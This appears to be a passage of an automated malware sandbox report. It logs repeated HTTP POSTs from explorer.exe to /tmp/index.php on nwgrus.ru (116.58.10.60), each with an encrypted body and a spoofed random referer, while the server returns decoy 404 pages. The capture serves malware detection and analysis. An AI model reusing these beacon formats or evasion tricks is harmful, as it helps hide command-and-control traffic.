                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.549725116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:48.060842991 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://xapousftkgr.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 198
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:48.060877085 CEST198OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 2b 54 a8 ea
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu+TW0yRDH*EoSvf7N(S.y^!nw( ~{KTQKO^zIu]
                                                                      Sep 25, 2024 16:01:49.324126959 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:49 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.549726116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:49.339158058 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://xhvcwlrrfnr.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 279
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:49.339195013 CEST279OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 7c 52 c6 e6
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu|RZBDPf`)q3mMY+hvq)X8}BJP~/Z5bwY@]f5w?e!tTVf-v:WT4:1C8
                                                                      Sep 25, 2024 16:01:50.595983982 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:50 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.549727116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:50.603841066 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://edyhjfoqqme.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 200
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:50.603859901 CEST200OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 3c 49 d5 9c
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu<IQnv~.1oi(E>}~0@$QCZ>/V.,1B!,=z`|jN.
                                                                      Sep 25, 2024 16:01:51.860969067 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:51 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.549728116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:51.873326063 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ecpbasxejvhmni.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 173
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:51.873358011 CEST173OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 30 02 a0 ae
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu0o[c:/ Oe9rhkws1<(N0{SU&d1/
                                                                      Sep 25, 2024 16:01:53.130346060 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:52 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.549729116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:53.138679028 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://pklhudfcrpsm.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 303
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:53.138693094 CEST303OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 6e 57 e2 fb
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vunWe[fv\N5y9X?FJ5\\:$,P}"]>~&;8H[33xT+yKm'z~Vp4]vv%Ld
                                                                      Sep 25, 2024 16:01:54.403583050 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:54 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.549730116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:54.420666933 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://bwdwojspdgtrj.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 166
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:54.420680046 CEST166OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 35 57 d5 f9
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu5W~[rDmkpRES^ak[\)9-P1\d7){{
                                                                      Sep 25, 2024 16:01:55.668787956 CEST189INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:55 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                                      Data Ascii: #\6Y9l_m=rA


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.549732116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:57.194613934 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://otxnyveihviep.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 257
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:57.194637060 CEST257OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 18 6b 2c 90 f4 76 0b 75 3d 4f f3 ad
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA ,[k,vu=OGj\^]5'[|b}U0h%tQ&U@IK[f]au5B%%JuDFL?CpICZp??3!4i
                                                                      Sep 25, 2024 16:01:58.462407112 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:58 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.549733116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:58.471280098 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://btdksbvigeadnr.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 160
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:58.471318007 CEST160OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 57 2f c9 ed
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vuW/x!{r?u\<_, bT!kEx?S_42IbU^&(E
                                                                      Sep 25, 2024 16:01:59.728923082 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:59 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.549735116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:59.737637997 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://xwykiojnclenqqi.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 116
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:59.737658978 CEST116OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 4e 38 c2 95
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vuN8!a^{D'Y
                                                                      Sep 25, 2024 16:02:01.002402067 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:02:00 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      23192.168.2.549736116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:02:01.058787107 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://nhtxkrllcfsfts.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 275
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:02:01.059075117 CEST275OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 28 01 b0 f4
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu(X@NCk+4a"hW;(DL"#BJ4^(b7_1{8p76/KO.tl$[OgI6(8
                                                                      Sep 25, 2024 16:02:02.506156921 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:02:02 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.549737116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:02:02.523468018 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://xdbwevihetlvramf.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 237
                                                                      Host: nwgrus.ru
